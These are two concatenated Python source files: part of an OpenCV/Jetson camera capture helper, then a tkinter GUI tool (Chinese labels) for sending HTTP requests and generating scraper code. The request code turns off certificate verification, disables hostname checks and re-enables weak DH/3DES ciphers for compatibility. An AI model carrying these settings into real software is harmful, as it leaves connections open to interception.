default=0, type=int)
parser.add_argument('--width', dest='image_width',
help='image width [640]',
default=640, type=int)
parser.add_argument('--height', dest='image_height',
help='image height [480]',
default=480, type=int)
return parser
def open_cam_usb(dev, width, height):
"""Open a USB webcam."""
if USB_GSTREAMER:
gst_str = ('v4l2src device=/dev/video{} ! '
'video/x-raw, width=(int){}, height=(int){} ! '
'videoconvert ! appsink').format(dev, width, height)
return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
else:
return cv2.VideoCapture(dev)
def open_cam_onboard():
"""Open the Jetson onboard camera."""
gst_str = ("nvarguscamerasrc ! "
"video/x-raw(memory:NVMM), "
"width=(int)1280, height=(int)720, "
"format=(string)NV12, framerate=(fraction)60/1 ! "
"nvvidconv flip-method=0 ! "
"video/x-raw, width=(int)1280, height=(int)720, format=(string)BGRx ! "
"videoconvert ! "
"video/x-raw, format=(string)BGR ! appsink")
return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
def grab_img(cam):
"""This 'grab_img' function is designed to be run in the sub-thread.
Once started, this thread continues to grab a new image and put it
into the global 'img_handle', until 'thread_running' is set to False.
"""
while cam.thread_running:
_, cam.img_handle = cam.cap.read()
if cam.img_handle is None:
logging.warning('grab_img(): cap.read() returns None...')
break
cam.thread_running = False
class VideoWriter:
def __init__(self, width, height, args, fps=24):
# type: (str, int, int, int) -> None
assert args.output_file.endswith('.mp4'), 'please specify the (.mp4) at the end '
# self._name = name
# self._height = height
# self._width = width
self.args = args
fourcc = cv2.VideoWriter_fourcc(*'mp4v')
self.__writer = cv2.VideoWriter(args.output_file, fourcc, fps, (width, height))
def write(self, frame):
if frame.dtype != np.uint8: # 检查frame的类型
raise ValueError('frame.dtype should be np.uint8')
self.__writer.write(frame)
def release(self):
self.__writer.release()
class Camera():
"""Camera class which supports reading images from theses video sources:
1. Video file
2. USB webcam
3. Jetson onboard camera
"""
def __init__(self, args):
self.args = args
self.is_opened = False
self.use_thread = False
self.thread_running = False
self.img_handle = None
self.img_width = 0
self.img_height = 0
self.cap = None
self.thread = None
#-----#
self.vwriter = None
def open(self):
"""Open camera based on command line arguments."""
assert self.cap is None, 'Camera is already opened!'
args = self.args
if args.use_file: #video
self.cap = cv2.VideoCapture(args.filename)
# ignore image width/height settings here
#TODO may occurs error since differnet opencv verison has different attribute name
width, height = int(self.cap.get(cv2.CAP_PROP_FRAME_WIDTH)), \
int(self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.vwriter = VideoWriter(width=width, height=height, args=args, fps=24)
self.use_thread = False
# elif args.use_image:
# self.cap = 'OK'
# self.img_handle = cv2.imread(args.filename)
# # ignore image width/height settings here
# if self.img_handle is not None:
# self.is_opened = True
# self.img_height, self.img_width, _ = self.img_handle.shape
# self.use_thread = False
elif args.use_usb:
self.cap = open_cam_usb(
args.video_dev,
args.image_width,
args.image_height
)
self.use_thread = True
else: # by default, use the jetson onboard camera
self.cap = open_cam_onboard()
print('using onboard cam now !')
self.use_thread = True
if self.cap != 'OK':
if self.cap.isOpened():
# Try to grab the 1st image and determine width and height
_, img = self.cap.read()
if img is not None:
self.img_height, self.img_width, _ = img.shape
self.is_opened = True
#-------thread-----------------#
def start(self):
assert not self.thread_running
if self.use_thread:
self.thread_running = True
self.thread = threading.Thread(target=grab_img, args=(self,))
self.thread.start()
def stop(self):
self.thread_running = False
if self.use_thread:
self.thread.join()
def read(self):
if self.args.use_file:
_, img = self.cap.read()
# if img is None:
# #logging.warning('grab_img(): cap.read() returns None...')
# # looping around
# self.cap.release()
# self.cap = cv2.VideoCapture(self.args.filename)
# _, img = self.cap.read()
return img
elif self.args.use_image:
return np.copy(self.img_handle)
else:
return self.img_handle
def write(self, frame):
if self.vwriter:
self.vwriter.write(frame)
def release(self):
# if self.cap != 'OK':
self.cap.release()
if self.vwriter is not None:
self.vwriter.release()
|
frame.py
|
try:
import requests
except:
requests = None
import io
import os
import re
import sys
import json
import zlib
import time
import hmac
import queue
import shutil
import base64
import hashlib
import tempfile
import traceback
import threading
import tkinter
import inspect
import zipfile
import itertools
import urllib.parse as ps
import tkinter.messagebox
from tkinter import ttk
from tkinter import scrolledtext
from tkinter.font import Font
from tkinter.simpledialog import askstring
from binascii import a2b_hex, b2a_hex
try:
from .root import DEFAULTS_HEADERS,root
except:
from root import DEFAULTS_HEADERS,root
Text = scrolledtext.ScrolledText
#Text = tkinter.Text
Label = ttk.Label
Button = ttk.Button
Combobox = ttk.Combobox
Entry = ttk.Entry
Checkbutton = tkinter.Checkbutton
# 测试两种 Frame 效果
# Frame = ttk.Frame # ttk.Frame 没有 highlightthickness 这个参数
Frame = tkinter.Frame
frame_setting = {}
pdx = 0
pdy = 0
lin = 0
def request_window(setting=None):
fr = Frame()
ft = Font(family='Consolas',size=10)
def change_method(*a):
method = cbx.get()
if method == 'POST':
temp_fr2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.BOTTOM)
elif method == 'GET':
temp_fr2.pack_forget()
def test_code(*a):
from .tab import create_test_code
create_test_code()
def scrapy_code(*a):
from .tab import create_scrapy_code
create_scrapy_code()
def urllib_code(*a):
from .tab import create_test_code_urllib
create_test_code_urllib()
def send_req(*a):
from .tab import send_request
send_request()
def _swich_encd(*a):
s = ent1.get().strip()
if s == 'utf-8':
ent1.delete(0,tkinter.END)
ent1.insert(0,'gbk')
elif s == 'gbk':
ent1.delete(0,tkinter.END)
ent1.insert(0,'utf-8')
else:
ent1.delete(0,tkinter.END)
ent1.insert(0,'utf-8')
def _swich_quote(*a):
s = ent2.get().strip()
if s == 'yes':
ent2.delete(0,tkinter.END)
ent2.insert(0,'no')
elif s == 'no':
ent2.delete(0,tkinter.END)
ent2.insert(0,'yes')
else:
ent2.delete(0,tkinter.END)
ent2.insert(0,'yes')
def _select_create_code(*a):
from .tab import nb
from .tab import SimpleDialog
q = [ '生成[requests]代码[Alt+c]',
'生成[scrapy]代码[Alt+s]',
'生成[urllib]代码[Alt+u]', ]
d = SimpleDialog(nb,
text="请选择生成的代码",
buttons=q,
default=0,
cancel=-1,
title="生成代码")
id = d.go()
if id == -1: return
if id == 0: test_code()
if id == 1: scrapy_code()
if id == 2: urllib_code()
temp_fr0 = Frame(fr)
methods = ('GET','POST')
cbx = Combobox(temp_fr0,width=10,state='readonly')
cbx['values'] = methods # 设置下拉列表的值
cbx.current(0)
cbx.pack(side=tkinter.RIGHT)
cbx.bind('<<ComboboxSelected>>', change_method)
temp_fr0.pack(fill=tkinter.X)
btn1 = Button(temp_fr0, text='发送请求[Ctrl+r]', command=send_req)
btn1.pack(side=tkinter.RIGHT)
ent1 = Entry(temp_fr0,width=6)
ent1.pack(side=tkinter.RIGHT)
btnurlencode = Button(temp_fr0, width=14, text='url中文编码格式', command=_swich_encd)
btnurlencode.pack(side=tkinter.RIGHT)
ent2 = Entry(temp_fr0,width=4)
ent2.pack(side=tkinter.RIGHT)
btnurlencode1 = Button(temp_fr0, width=18, text='url是否编码“+”符号', command=_swich_quote)
btnurlencode1.pack(side=tkinter.RIGHT)
lab1 = Label(temp_fr0, text='请尽量发送请求后生成代码,那样会有更多功能:')
lab1.pack(side=tkinter.LEFT)
# btn6 = Button(temp_fr0, text='生成[requests]代码[Alt+c]', command=test_code)
# btn6.pack(side=tkinter.LEFT)
# btn7 = Button(temp_fr0, text='生成[scrapy]代码[Alt+s]', command=scrapy_code)
# btn7.pack(side=tkinter.LEFT)
# btn8 = Button(temp_fr0, text='生成[urllib]代码[Alt+u]', command=urllib_code)
# btn8.pack(side=tkinter.LEFT)
def local_collection(*a):
def _show(*a, stat='show'):
try:
if stat == 'show': et.pack(side=tkinter.RIGHT)
if stat == 'hide': et.pack_forget()
except:
pass
_show(stat='show') if va.get() else _show(stat='hide')
va = tkinter.IntVar()
rb = Checkbutton(temp_fr0,text='使用代理',variable=va,command=local_collection)
rb.deselect()
et = Entry (temp_fr0, width=16)
et.insert(0, '127.0.0.1:8888')
rb.pack(side=tkinter.RIGHT)
btn9 = Button(temp_fr0, text='选择生成代码', command=_select_create_code)
btn9.pack(side=tkinter.LEFT)
temp_fr1 = Frame(fr,highlightthickness=lin)
temp_fold_fr1 = Frame(temp_fr1)
temp_fold_fr2 = Frame(temp_fr1)
lb1 = Label (temp_fold_fr1,text='url')
tx1 = Text (temp_fold_fr1,height=1,width=1,font=ft)
lb1.pack(side=tkinter.TOP)
tx1.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP,padx=pdx,pady=pdy)
lb2 = Label (temp_fold_fr2,text='headers')
tx2 = Text (temp_fold_fr2,height=1,width=1,font=ft)
lb2.pack(side=tkinter.TOP)
tx2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP,padx=pdx,pady=pdy)
temp_fold_fr1.pack(fill=tkinter.BOTH,expand=True,side=tkinter.LEFT)
temp_fold_fr2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.LEFT)
temp_fr1.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP)
temp_fr2 = Frame(fr,highlightthickness=lin)
lb3 = Label (temp_fr2,text='body')
tx3 = Text (temp_fr2,height=1,width=1,font=ft)
lb3.pack(side=tkinter.TOP)
tx3.pack(fill=tkinter.BOTH,expand=True,padx=pdx,pady=pdy)
if setting and setting.get('method') == 'POST':
cbx.current(methods.index('POST'))
temp_fr2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.BOTTOM)
if setting:
tx1.insert(0.,setting['url'].strip())
tx2.insert(0.,setting['headers'].strip())
tx3.insert(0.,setting['body'].strip())
ent1.insert(0,setting.get('urlenc') or 'utf-8')
ent2.insert(0,setting.get('qplus') or 'no')
if setting.get('proxy'):
et.delete(0, tkinter.END)
et.insert(0, setting.get('proxy'))
et.pack(side=tkinter.RIGHT)
rb.select()
else:
tx2.insert(0.,DEFAULTS_HEADERS.strip())
ent1.insert(0,'utf-8')
ent2.insert(0,'no')
frame_setting[fr] = {}
frame_setting[fr]['type'] = 'request'
frame_setting[fr]['fr_method'] = cbx
frame_setting[fr]['fr_url'] = tx1
frame_setting[fr]['fr_headers'] = tx2
frame_setting[fr]['fr_body'] = tx3
frame_setting[fr]['fr_urlenc'] = ent1
frame_setting[fr]['fr_qplus'] = ent2
frame_setting[fr]['fr_proxy'] = va, et
return fr
def response_window(setting=None):
'''
这里的 setting 结构应该就是一个请求信息的数据结构
并且应该是整理好数据类型的字典,在这里请求任务结束之后返回的数据
就按照展示结构放在 response 的结构框架里面。
url :str
method :str
headers :dict
body :str
'''
def insert_txt(fr_txt, txt):
try:
fr_txt.delete(0.,tkinter.END)
fr_txt.insert(0.,re.sub('[\uD800-\uDBFF][\uDC00-\uDFFF]|[\U00010000-\U0010ffff]','',txt))
except:
pass
doc0 = '''选择列表解析路径方式
冒号后面配置的的内容为 xpath
<xpath:>
*组合功能!
如果先使用了 “分析xpath” 功能后解析到路径
那么使用该功能时会自动弹出选择窗口
选择窗中的内容为自动解析xpath中解析出的 xpath
'''
doc1 = '''纯文字内容解析
解析某个 xpath 路径下面的所有文字字符串,默认是 //html 路径下的所有文字
<normal_content://html>
'''
doc2 = '''根据字符串自动分析 xpath 路径
一般用于列表形式的路径
通常来说这个功能针对简单的网页结构还勉强有用,并非一定能够解析
所以一些比较复杂的网页或许还是需要考虑自行分析xpath。
冒号后面配置需要处理的字符串
多个字符串可以通过空格分隔
eg.:
<auto_list_xpath:白天 黑夜>
不写则为查找所有 "string(.)" (xpath语法)
能解析出含有非空字符串的内容路径
'''
doc3 = '''简单分析json数据内容
找出最长的list进行初步的迭代分析,并给出分析结果在输出框
如果没有主动选择某一个json列表,则默认使用第一个最长的列表
进行默认的代码生成
<auto_list_json:>
'''
doc4 = '''选择分析的json列表
选择的json列表的解析方式放在auto_list_json配置的后面
当你生成代码的时候将会使用这个进行对列表解析自动生成对应的代码
下面是一个例子:
<auto_list_json:jsondata["data"]["list"]>
'''
doc5 = '''生成scrapy代码
如果存在 “解析xpath”、“自动json” 或 “获取纯文字” 状态
则会在生成代码中包含相应的代码
'''
doc6 = '''生成requests代码
如果存在 “解析xpath”、“自动json” 或 “获取纯文字” 状态
则会在生成代码中包含相应的代码
'''
def document(*a):
method = cbx.get()
if methods.index(method) == 0:
insert_txt(tx3,doc0)
if methods.index(method) == 1:
insert_txt(tx3,doc1)
if methods.index(method) == 2:
insert_txt(tx3,doc2)
if methods.index(method) == 3:
insert_txt(tx3,doc3)
if methods.index(method) == 4:
insert_txt(tx3,doc4)
if methods.index(method) == 5:
insert_txt(tx3,doc5)
if methods.index(method) == 6:
insert_txt(tx3,doc6)
switch_show(onlyshow=True)
fr = Frame()
ft = Font(family='Consolas',size=10)
def switch_show(*a, onlyshow=False):
try:
temp_fold_fr2.pack_info()
packed = True
except:
packed = False
if packed:
if not onlyshow:
temp_fold_fr2.pack_forget()
else:
temp_fold_fr2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.LEFT)
def html_pure_text(*a):
from .tab import get_html_pure_text
get_html_pure_text()
def xpath_elements(*a):
from .tab import get_xpath_elements
get_xpath_elements()
def auto_xpath(*a):
from .tab import get_auto_xpath
get_auto_xpath()
def auto_json(*a):
from .tab import get_auto_json
get_auto_json()
def choice_json(*a):
from .tab import choice_auto_json
choice_auto_json()
def test_code(*a):
from .tab import create_test_code
create_test_code()
def scrapy_code(*a):
from .tab import create_scrapy_code
create_scrapy_code()
def urllib_code(*a):
from .tab import create_test_code_urllib
create_test_code_urllib()
def jsonformat(*a):
from .tab import response_jsonformat
response_jsonformat()
def xpath_finder(*a):
from .tab import nb
from .tab import create_xpath_finder
setting = {}
setting['content'] = tx1.get(0.,tkinter.END).strip()
setting['master'] = nb
s = create_xpath_finder(setting)
tx2.delete(0., tkinter.END)
tx2.insert(0., '<just_info:>\n' + s)
def _select_analysis(*a):
from .tab import nb
from .tab import SimpleDialog
q = [ '(Alt+f)分析xpath',
'(Alt+x)选择xpath',
'(Alt+z)分析json',
'(Alt+q)选择json',
'(Alt+d)获取纯文字',
'xpath内容分析', ]
d = SimpleDialog(nb,
text="请选择分析内容的方式,分析后再生成代码,会自动在代码内带有分析处理的代码块。",
buttons=q,
default=0,
cancel=-1,
title="分析内容")
id = d.go()
if id == -1: return
if id == 0: auto_xpath()
if id == 1: xpath_elements()
if id == 2: auto_json()
if id == 3: choice_json()
if id == 4: html_pure_text()
if id == 5: xpath_finder()
def _select_create_code(*a):
from .tab import nb
from .tab import SimpleDialog
q = [ '生成[requests]代码[Alt+c]',
'生成[scrapy]代码[Alt+s]',
'生成[urllib]代码[Alt+u]', ]
d = SimpleDialog(nb,
text="请选择生成的代码",
buttons=q,
default=0,
cancel=-1,
title="生成代码")
id = d.go()
if id == -1: return
if id == 0: test_code()
if id == 1: scrapy_code()
if id == 2: urllib_code()
temp_fr0 = Frame(fr)
lab1 = Label(temp_fr0, text='功能说明:')
lab1.pack(side=tkinter.LEFT)
methods = ('(Alt+x) 选择xpath','(Alt+d) 获取纯文字','(Alt+f) 分析xpath','(Alt+z) 分析json','(Alt+q) 选择json', '(Alt+s) 生成 scrapy代码', '(Alt+c) 生成 requests代码')
cbx = Combobox(temp_fr0,width=18,state='readonly')
cbx['values'] = methods # 设置下拉列表的值
cbx.current(0)
cbx.pack(side=tkinter.LEFT)
cbx.bind('<<ComboboxSelected>>', document)
temp_fr0.pack(fill=tkinter.X)
btn11 = Button(temp_fr0, text='选择内容分析', command=_select_analysis)
btn11.pack(side=tkinter.LEFT)
# btn3 = Button(temp_fr0, text='(f)分析xpath', command=auto_xpath)
# btn3.pack(side=tkinter.LEFT)
# btn4 = Button(temp_fr0, text='(x)选择xpath', command=xpath_elements)
# btn4.pack(side=tkinter.LEFT)
# btn5 = Button(temp_fr0, text='(z)分析json', command=auto_json)
# btn5.pack(side=tkinter.LEFT)
# btn9 = Button(temp_fr0, text='(q)选择json', command=choice_json)
# btn9.pack(side=tkinter.LEFT)
# btn2 = Button(temp_fr0, text='(d)获取纯文字', command=html_pure_text)
# btn2.pack(side=tkinter.LEFT)
# btn10 = Button(temp_fr0, text='xpath内容分析', command=xpath_finder)
# btn10.pack(side=tkinter.LEFT)
btn9 = Button(temp_fr0, text='json格式化', command=jsonformat)
btn9.pack(side=tkinter.LEFT)
style = ttk.Style()
style.map("TEST.TButton",
foreground=[('!focus', '#EE6363')],
)
lab2 = Label(temp_fr0, text="正在请求", style='TEST.TButton')
lab2.pack(side=tkinter.LEFT)
btn1 = Button(temp_fr0, text='显示/隐藏配置', command=switch_show)
btn1.pack(side=tkinter.RIGHT)
# btn6 = Button(temp_fr0, text='生成[requests]代码', command=test_code)
# btn6.pack(side=tkinter.RIGHT)
# btn7 = Button(temp_fr0, text='生成[scrapy]代码', command=scrapy_code)
# btn7.pack(side=tkinter.RIGHT)
# btn8 = Button(temp_fr0, text='生成[urllib]代码', command=urllib_code)
# btn8.pack(side=tkinter.RIGHT)
btn9 = Button(temp_fr0, text='选择生成代码', command=_select_create_code)
btn9.pack(side=tkinter.RIGHT)
def _swich_encd(*a):
s = ent1.get().strip()
if s == 'utf-8':
ent1.delete(0,tkinter.END)
ent1.insert(0,'gbk')
elif s == 'gbk':
ent1.delete(0,tkinter.END)
ent1.insert(0,'utf-8')
else:
ent1.delete(0,tkinter.END)
ent1.insert(0,'utf-8')
def _swich_quote(*a):
s = ent2.get().strip()
if s == 'yes':
ent2.delete(0,tkinter.END)
ent2.insert(0,'no')
elif s == 'no':
ent2.delete(0,tkinter.END)
ent2.insert(0,'yes')
else:
ent2.delete(0,tkinter.END)
ent2.insert(0,'yes')
ent1 = Entry(temp_fr0,width=6)
ent1.pack(side=tkinter.RIGHT)
btnurlencode = Button(temp_fr0, width=14, text='url中文编码格式', command=_swich_encd)
btnurlencode.pack(side=tkinter.RIGHT)
urlenc = (setting.get('urlenc') or 'utf-8') if setting is not None else 'utf-8'
ent1.insert(0, urlenc)
ent2 = Entry(temp_fr0,width=4)
ent2.pack(side=tkinter.RIGHT)
btnurlencode1 = Button(temp_fr0, width=18, text='url是否编码“+”符号', command=_swich_quote)
btnurlencode1.pack(side=tkinter.RIGHT)
qplus = (setting.get('qplus') or 'no') if setting is not None else 'no'
ent2.insert(0, qplus)
proxy = None
if setting and setting.get('proxy'):
varify = re.findall(r'(\d+)\.(\d+)\.(\d+)\.(\d+):(\d+)', setting.get('proxy'))
if varify:
a,b,c,d,e = map(int, varify[0])
if a >= 0 and a <= 255 and b >= 0 and b <= 255 and c >= 0 and c <= 255 and d >= 0 and d <= 255 and e >= 0 and e <= 65535:
Label(temp_fr0, text='使用代理: {}'.format(setting.get('proxy'))).pack(side=tkinter.RIGHT)
proxy = setting.get('proxy').strip()
else:
Label(temp_fr0, text='错误的代理: {}'.format(setting.get('proxy'))).pack(side=tkinter.RIGHT)
temp_fr1 = Frame(fr,highlightthickness=lin)
temp_fold_fr1 = Frame(temp_fr1)
lb1 = Label (temp_fold_fr1,text='HTML文本展示')
tx1 = Text (temp_fold_fr1,height=1,width=1,font=ft,wrap='none')
lb1.pack(side=tkinter.TOP)
tx1.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP,padx=pdx,pady=pdy)
temp_fold_fr2 = Frame(temp_fr1)
temp_fold_fold_fr1 = Frame(temp_fold_fr2)
temp_fold_fold_fr2 = Frame(temp_fold_fr2)
lb2 = Label (temp_fold_fold_fr1,text='配置数据')
tx2 = Text (temp_fold_fold_fr1,height=1,width=1,font=ft)
lb2.pack(side=tkinter.TOP)
tx2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP,padx=pdx,pady=pdy)
lb3 = Label (temp_fold_fold_fr2,text='执行说明')
tx3 = Text (temp_fold_fold_fr2,height=1,width=1,font=ft)
lb3.pack(side=tkinter.TOP)
tx3.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP,padx=pdx,pady=pdy)
temp_fold_fold_fr1.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP)
temp_fold_fold_fr2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP)
temp_fold_fr1.pack(fill=tkinter.BOTH,expand=True,side=tkinter.LEFT)
# temp_fold_fr2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.LEFT)
temp_fr1.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP)
temp_fr2 = Frame(fr,highlightthickness=lin)
lb4 = Label (temp_fr2,text='解析内容[Esc 开启/关闭解析显示]')
tx4 = Text (temp_fr2,height=1,width=1,font=ft)
lb4.pack(side=tkinter.TOP)
tx4.pack(fill=tkinter.BOTH,expand=True,padx=pdx,pady=pdy)
#temp_fr2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.BOTTOM)
frame_setting[fr] = {}
frame_setting[fr]['type'] = 'response'
frame_setting[fr]['fr_setting'] = setting # 用于生成代码时候需要调用到
frame_setting[fr]['fr_html_content'] = tx1
frame_setting[fr]['fr_local_set'] = tx2 # 当前解析脚本的方法类型以及配置
frame_setting[fr]['fr_local_info'] = tx3 # 一个辅助说明的文本空间
frame_setting[fr]['fr_parse_info'] = tx4
frame_setting[fr]['fr_temp2'] = temp_fr2 # 解析输出的 Text 框,这里用外部frame是为了挂钩esc按键显示/关闭该窗口
frame_setting[fr]['fr_urlenc'] = ent1
frame_setting[fr]['fr_qplus'] = ent2
# 统一数据格式
def format_content(content):
if type(content) is bytes:
try:
content = content.decode('utf-8')
typ = 'utf-8'
except:
try:
content = content.decode('gbk')
typ = 'gbk'
except:
content = content.decode('utf-8',errors='ignore')
typ = 'utf-8 ignore'
insert_txt(tx3, '解析格式:{}'.format(typ))
return typ,content
else:
einfo = 'type:{} is not in type:[bytes]'.format(type(content))
raise TypeError(einfo)
from urllib import request
from urllib.parse import quote, unquote, unquote_plus, quote_plus, urlencode
if qplus == 'yes':
_quote,_unquote = quote_plus,unquote_plus
elif qplus == 'no':
_quote,_unquote = quote,unquote
def quote_val(url, enc): return re.sub(r'([\?&][^=&]*=)([^&]*)', lambda i:i.group(1)+_quote(_unquote(i.group(2), encoding=enc), encoding=enc), url)
def urllib_myget(url, headers, proxies):
r = request.Request(url, method='GET')
for k, v in headers.items():
if k.lower() == 'accept-encoding': continue # urllib并不自动解压缩编码,所以忽略该headers字段
r.add_header(k, v)
opener = request.build_opener(request.ProxyHandler(proxies))
return opener.open(r)
def urllib_mypost(url, headers, body, proxies):
r = request.Request(url, method='POST')
for k, v in headers.items():
if k.lower() == 'accept-encoding': continue # urllib并不自动解压缩编码,所以忽略该headers字段
r.add_header(k, v)
opener = request.build_opener(request.ProxyHandler(proxies))
return opener.open(r, data=body)
proxies = {'http':'http://{}'.format(proxy), 'https':'http://{}'.format(proxy)} if proxy else None
def _request(method,url,headers,body):
# from .tab import dprint
# dprint(requests)
if requests.__dict__.get('get') and requests is not None:
rurl = quote_val(_unquote(url, encoding=urlenc), enc=urlenc)
if method == 'GET':
s = requests.get(rurl,headers=headers,verify=False,proxies=proxies)
tp,content = format_content(s.content)
elif method == 'POST':
s = requests.post(rurl,headers=headers,data=body,verify=False,proxies=proxies)
tp,content = format_content(s.content)
else:
# 备用的请求工具,主要还是考虑如果 requests 不能用的情况下依旧至少能够走完发包的流程
url = quote_val(_unquote(url, encoding=urlenc), enc=urlenc)
if method == 'GET':
s = urllib_myget(url, headers, proxies)
tp, content = format_content(s.read())
elif method == 'POST':
body = urlencode(body).encode('utf-8') if isinstance(body, dict) else body
s = urllib_mypost(url, headers, body, proxies)
tp, content = format_content(s.read())
return tp, content
def _handle_dh_key_too_small():
try:
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
requests.packages.urllib3.contrib.pyopenssl.DEFAULT_SSL_CIPHER_LIST += ':HIGH:!DH:!aNULL'
except AttributeError:
pass
import ssl
ssl._DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
# 为了兼容旧的 3DES 传输,(新标准中删除是因为不安全,但是架不住有些服务器用,所以需要考虑兼容)
_bak_init_poolmanager = requests.adapters.HTTPAdapter.init_poolmanager
_bak_proxy_manager_for = requests.adapters.HTTPAdapter.proxy_manager_for
def create_ssl_context():
import ssl
ctx = ssl.create_default_context()
ctx.set_ciphers( 'ECDH+3DES:DH+3DES:RSA+3DES:!aNULL:!eNULL:!MD5' )
if getattr(ctx, 'check_hostname', None) is not None:
ctx.check_hostname = False
return ctx
def init_poolmanager(self, *args, **kwargs):
kwargs['ssl_context'] = create_ssl_context()
return _bak_init_poolmanager(self, *args, **kwargs)
def proxy_manager_for(self, *args, **kwargs):
kwargs['ssl_context'] = create_ssl_context()
return _bak_proxy_manager_for(self, *args, **kwargs)
def _handle_3des_drop_out_stand():
requests.adapters.HTTPAdapter.init_poolmanager = init_poolmanager
requests.adapters.HTTPAdapter.proxy_manager_for = proxy_manager_for
def _unhook_handle_3des_drop_out_stand():
requests.adapters.HTTPAdapter.init_poolmanager = _bak_init_poolmanager
requests.adapters.HTTPAdapter.proxy_manager_for = _bak_proxy_manager_for
tp = None
extra = []
import queue
Q = queue.Queue()
# 使用新增线程执行请求,防止卡顿,优化。
def req_in_thead():
nonlocal tp, extra, fr, Q
def inier_func():
nonlocal tp, extra, fr
if setting is not None:
method = setting.get('method')
url = setting.get('url')
headers = setting.get('headers')
body = setting.get('body')
try:
tp, content = _request(method,url,headers,body)
except:
einfo = traceback.format_exc()
if 'dh key too small' in einfo:
extra.append('dh key too small')
_handle_dh_key_too_small()
tp, content = _request(method,url,headers,body)
elif '''SSLError("bad handshake: SysCallError(-1, 'Unexpected EOF')",)''' in einfo:
extra.append('3des drop out stand')
_handle_3des_drop_out_stand()
tp, content = _request(method,url,headers,body)
_unhook_handle_3des_drop_out_stand()
else:
tkinter.messagebox.showinfo('Error',einfo)
Q.put(["请求失败", einfo])
raise
return content
Q.put(["请求成功", inier_func()])
frame_setting[fr]['fr_parse_type'] = tp
frame_setting[fr]['fr_extra'] = extra
threading.Thread(target=req_in_thead).start()
def loop_in_tkinter():
nonlocal Q, tx1
from .tab import nb
while Q.qsize():
try:
lab2['text'], content = Q.get_nowait()
insert_txt(tx1, content)
except queue.Empty:
pass
nb.after(200, loop_in_tkinter)
loop_in_tkinter()
# tp = None
# extra = []
# if setting is not None:
# method = setting.get('method')
# url = setting.get('url')
# headers = setting.get('headers')
# body = setting.get('body')
# try:
# tp, content = _request(method,url,headers,body)
# except:
# einfo = traceback.format_exc()
# if 'dh key too small' in einfo:
# extra.append('dh key too small')
# _handle_dh_key_too_small()
# tp, content = _request(method,url,headers,body)
# else:
# tkinter.messagebox.showinfo('Error',einfo)
# raise
# # insert_txt(tx1, traceback.format_exc())
# frame_setting[fr]['fr_parse_type'] = tp
# frame_setting[fr]['fr_extra'] = extra
return fr
# 暂时考虑用下面的方式来试着挂钩函数执行的状态。
# 不过似乎还是有些漏洞,先就这样,后面再补充完整。
# 当初我不知道我为啥要这么傻逼的使用这样的方式来处理,可能当时还没有找到怎么实现 tkinter 的多线程执行怎么处理吧
# 现在已经明白了,所有 tkinter 的控件一定要在住线程内执行,可以使用无限递归的的函数来实现 重点是 after 函数,
import sys
__org_stdout__ = sys.stdout
__org_stderr__ = sys.stderr
# class stdhooker:
# def __init__(self, hook=None, style=None):
# if hook.lower() == 'stdout':
# self.__org_func__ = __org_stdout__
# elif hook.lower() == 'stderr':
# self.__org_func__ = __org_stderr__
# else:
# raise 'stdhooker init error'
# self.cache = ''
# self.style = style
# self.predk = {}
# def write(self,text):
# self.logtx = get_tx()
# if self.logtx not in self.predk:
# self.predk[self.logtx] = 0
# self.cache += text
# if '\n' in self.cache:
# _text = self.cache.rsplit('\n',1)
# self.cache = '' if len(_text) == 1 else _text[1]
# _text_ = _text[0] + '\n'
# if self.logtx:
# try:
# self.logtx.insert(tkinter.END, _text_)
# except:
# self.logtx.insert(tkinter.END, re.sub('[\uD800-\uDBFF][\uDC00-\uDFFF]|[\U00010000-\U0010ffff]','',_text_))
# # self.logtx.insert(tkinter.END, _text_)
# self.logtx.see(tkinter.END)
# self.logtx.update()
# def flush(self):
# try:
# self.__org_func__.flush()
# except:
# pass
# def get_tx():
# for i in inspect.stack():
# if '__very_unique_cd__' in i[0].f_locals:
# return i[0].f_locals['cd']
# sys.stdout = stdhooker('stdout',style='normal')
# 生成代码临时放在这里
def code_window(setting=None):
fr = Frame()
ft = Font(family='Consolas',size=10)
if setting.get('type') == 'request':
va,prox = setting.get('fr_proxy')
proxy = prox.get().strip() if va.get() else None
if setting.get('type') == 'response':
proxy = setting.get('fr_setting').get('proxy')
if proxy and setting.get('code_string'):
rep = "None # {'http':'http://127.0.0.1:8888', 'https':'http://127.0.0.1:8888'}"
rpl = "{'http':'http://" +proxy+ "', 'https':'http://" +proxy+ "'}"
setting['code_string'] = setting['code_string'].replace(rep, rpl)
def _execute_code(*a):
from .tab import execute_code
execute_code()
def save_script_in_desktop(*a):
name = askstring('脚本名','请输入脚本文件名,尽量小写无空格。')
if not name: return
if not name.endswith('.py'): name += '.py'
desktop_script = os.path.join(os.path.expanduser("~"),'Desktop\\{}'.format(name))
if not os.path.isfile(desktop_script):
with open(desktop_script, 'w', encoding='utf-8') as f:
f.write(tx.get(0.,tkinter.END))
else:
tkinter.messagebox.showwarning('脚本已存在','脚本已存在')
tframe = Frame(fr)
tframe.pack(side=tkinter.TOP)
btn1 = Button(tframe, text='保存脚本到桌面', command=save_script_in_desktop)
btn1.pack(side=tkinter.LEFT)
btn2 = Button(tframe, text='执行代码 [Alt+v]', command=_execute_code)
btn2.pack(side=tkinter.LEFT)
tx = Text(fr,height=1,width=1,font=ft)
cs = setting.get('code_string')
if cs:
tx.delete(0.,tkinter.END)
tx.insert(0.,cs)
tx.pack(fill=tkinter.BOTH,expand=True,padx=pdx,pady=pdy)
